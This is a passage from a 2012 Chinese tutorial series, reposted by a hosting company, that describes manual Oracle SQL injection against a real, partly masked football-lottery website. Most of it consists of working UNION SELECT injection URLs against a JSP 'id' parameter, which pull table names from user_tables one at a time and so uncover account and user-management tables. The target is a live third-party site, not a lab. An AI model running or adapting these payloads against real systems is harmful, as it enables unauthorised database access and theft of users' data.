参考案例:手工Oracle注入某足彩在线网站(4) |
| 发布时间: 2012/7/7 11:28:59 |
|
查询获取表名
先来查询一下当前数据库中的表名,提交: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1),5,'6','7' from dual 图5 这里选择了字段4处返回信息,得到第1个表名为ACCOUNTS(图5)。 http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS'),5,'6','7' from dual 注意,表名一定要大写。提交后返回第2个表名为A_USER。再提交: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS' and table_name<>'A_USER'),5,'6','7' from dual 得到第3个表名BOBO_URL_INFO。用同样的方法,可得到其它所有表名,发现其中有一个极为重要的表名USERMG。 本文出自:亿恩科技【www.enkj.com】 |
京公网安备41019702002023号